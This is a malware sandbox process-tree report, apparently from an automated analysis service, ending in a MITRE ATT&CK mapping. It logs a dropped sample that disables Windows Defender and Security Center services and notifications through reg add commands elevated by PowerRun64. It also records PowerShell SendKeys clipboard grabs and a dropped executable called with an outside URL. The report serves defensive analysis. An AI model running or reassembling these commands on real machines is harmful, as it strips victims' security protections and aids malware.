    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1228
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1604
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f
    3⤵
    PID:2792
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
    3⤵
    PID:956
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender notification settings
    - System Location Discovery: System Language Discovery
    PID:2248
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender notification settings
    - System Location Discovery: System Language Discovery
    PID:2516
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
    3⤵
    PID:1652
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3068
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2316
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1188
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:2560
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2208
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:676
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1012
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:2712
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2172
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2136
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:3016
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:2796
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2952
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2376
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2636
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:1712
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2664
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2772
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2356
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:856
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:912
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:108
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1516
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies security service
        
        PID:1008
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1736
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:2004
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2384
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies security service
        
        PID:2028
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1104
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:952
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:900
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:2408
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1684
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1728
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2184
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:1632
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1464
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:2480
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2680
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:1084
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1000
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:2264
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2696
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:2692
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2588
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:2136
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1852
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:2548
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1700
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:2352
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2772
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:2284
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2604
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1224
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2392
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies security service
        
        PID:412
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1704
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      PID:2964
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2296
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies security service
        
        PID:1740
- - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    3⤵
    - Executes dropped EXE
    PID:1604
  - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
      "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
      4⤵
      Executes dropped EXE
      PID:708
    - - C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:1104
      - C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Modifies Security services
        
        PID:2444
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Get-MpPreference"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    PID:788
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:596
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    PID:1512
- C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\acxxtzcogvgr.exe
  "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\acxxtzcogvgr.exe" "http://www.imagerymacdermott.click" "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\5527"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2896
- C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\win_version_csharp.exe
  "C:\Users\Admin\AppData\Local\Temp\nseE033.tmp\win_version_csharp.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2068
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\system32\explorer.exe
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  PID:2712

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241204135721.log C:\Windows\Logs\CBS\CbsPersist_20241204135721.cab
1⤵
- Drops file in Windows directory
PID:1584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Modify Registry